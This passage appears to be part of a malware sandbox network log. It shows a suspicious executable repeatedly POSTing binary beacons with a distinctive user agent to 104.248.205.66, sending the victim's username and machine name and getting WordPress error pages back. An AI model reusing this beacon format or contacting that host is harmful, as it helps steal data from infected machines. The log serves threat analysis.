                        Aug 29, 2024 12:03:16.695597887 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        10192.168.2.849730104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:16.841785908 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:16.846754074 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:19.141123056 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:17 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:19.141285896 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:03:19.141299009 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        11192.168.2.849731104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:19.301708937 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:19.308275938 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:21.616108894 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:19 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:21.616139889 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:03:21.616154909 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        12192.168.2.849732104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:21.761614084 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:21.768470049 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:24.159673929 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:22 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:24.159693003 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Aug 29, 2024 12:03:24.159703016 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Aug 29, 2024 12:03:24.159714937 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        13192.168.2.849733104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:24.310172081 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:24.315193892 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:26.573676109 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:24 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:26.573699951 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:03:26.573713064 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        14192.168.2.849734104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:26.715199947 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:26.720005035 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:29.124326944 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:27 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:29.124345064 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Aug 29, 2024 12:03:29.124352932 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Aug 29, 2024 12:03:29.124366045 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        15192.168.2.849735104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:29.277251005 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:29.282131910 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:31.572973967 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:29 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
